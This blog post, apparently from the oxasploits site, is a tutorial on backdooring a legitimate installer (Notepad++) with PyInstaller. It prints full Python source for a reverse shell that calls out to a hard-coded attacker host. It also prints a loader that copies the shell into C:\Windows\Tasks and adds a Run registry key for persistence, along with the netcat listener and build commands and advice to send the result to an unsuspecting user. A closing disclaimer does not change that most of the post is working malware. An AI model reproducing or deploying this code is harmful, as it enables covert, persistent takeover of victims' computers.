Recently Updated
Backdoors embedded along side installers
If you enjoy my work, sponsor or hire me! I work hard keeping oxasploits running!Bitcoin Address:
bc1qclqhff9dlvmmuqgu4907gh6gxy8wy8yqk596yp
Thank you so much and happy hacking!
What is PyInstaller and why do we need it?
PyInstaller is basically a binary that includes bundled within: python, your python dependancies, your python scripts, as well as any other binaries (.exe or .dll) that you would like to include. You may also link in an icon resource on build. Why do I use PyInstaller? Because it’s commonly enough used that it won’t be flagged itself as a virus or as malware, but I can still pack inside malicious code.
What malicious code
A legitamite installer or program can be any piece of compiled code (al la: into an .exe) that is not related to this project’s code can be imported in and executed at the same time my reverse shell starts. The malicious code does it’s business in the background, forking off as another process and copying itself to a new loocation, while the user is using the installer or program as normal, with no knowlwdge of the backdoor that is about to pop back through the firewall connecting “outbound” towards a netcat lisener. While this is happening, a registry key is created which enters our reverse shell into the system’s Administrator level startup chain. It’s easy to spot if you know what you are looking for, but genearlly, this will be persistent long enough that you can allot yourself a couple mistakes and still have access to the machine (not get locked out). If you happen to get disconnected, kill then restart the netcat listener per:
nc -l -p 7777 -v
(change the port as necessary), and within a couple seconds the reverse shell loops back aroun and fires off another connection request towardsd your listener with another Administrator shell.
The shell’s code
This isn’t particularly interesting shellcode, howver it is handy. I recommend editing it to your use case in Notepad++ because things like the attacker host and port are hard coded.
import os
import socket
import subprocess
import time
import sys
host = '01.dev.oxasploits.com'
port = 7887
def shell():
s = socket.socket
(socket.AF_INET
, socket.SOCK_STREAM)
s.connect((host
, port))
s.send(str
.encode("[*] Connect back from vicitim!
\n"))
s.send(str
.encode(os.
getlogin() + "\n\n
"))
while 1:
try:
time.sleep(3)
s.send(
str.encode(os.
getcwd() + "> "))
data = s.
recv(1024).decode("UTF-8")
data = data.strip('\n')
if data == "quit":
break
if data[:2] == "cd":
os.chdir(data[3:])
if len(data) > 0:
proc = subprocess.
Popen(data, shell
=True, stdout=
subprocess.PIPE, stderr=subprocess.PIPE
, stdin=subprocess.PIPE)
stdout_value = proc.
stdout.read() +
proc.stderr.read
()
output_str = str(
stdout_value, "UTF-8")
s.send(str.encode("\n" + output_str))
except Exception as e:
break
s.close()
while 1:
try:
shell()
sleep(15)
except Exception as f:
continueThe packed loader
import os
import time
import winreg
import shutil
import subprocess
from pathlib import Path
host = '01.dev.oxasploits.com'
def resource_path(relative_path
):
base_path = getattr(sys, '_MEIPASS', os
.path.dirname(
os.path.abspath
(__file__)))
return os.path.
join(base_path, relative_path)
def registry_start(app_name, key_data=None,
autostart: bool =
True) -> bool:
with winreg.OpenKey(
key=winreg.HKEY_CURRENT_USER,
sub_key=r
'Software\Microsoft\Windows\CurrentVersion\Run',
reserved=0,
access=winreg.KEY_ALL_ACCESS,
) as key:
try:
if autostart:
winreg.SetValueEx(
key, app_name, 0
, winreg.REG_SZ
, key_data)
else:
winreg.DeleteValue(
key, app_name)
except OSError:
return False
return True
subprocess.Popen(
resource_path('.\shell.exe'))
subprocess.Popen(
resource_path('nppi.exe'))
pwnpath = r'C:\Windows\Tasks\taskserv.exe'
ppath = Path(pwnpath
)
if not ppath.is_file
():
shutil.copyfile(resource_path('shell.exe'),
pwnpath)
registry_start('TaskServ',
pwnpath)Build
Then all you need to do is build the project with:
pyinstaller.exe --windowed --noconsole
--onefile --uac-admin .\shell.py
copy dist\shell.exe .\
pyinstaller.exe --add-binary="shell.exe;." --add-binary="nppi.exe;." --icon=npp_103.ico --windowed --noconsole --onefile
--uac-admin .\loader.pyThen run the .bat and send it on it’s way to be picked up by an unsuspecting computer user.
The End
In the end this is pretty evil code and should never be used against a target. Seriously, under any circumstances, ever. It looks benighn and totally comromises a machine while hiding it’s existance and persistently opens connections to pwn the machine.
Do. Not. Abuse. This. Code.
This post is licensed under CC BY 4.0 by the author.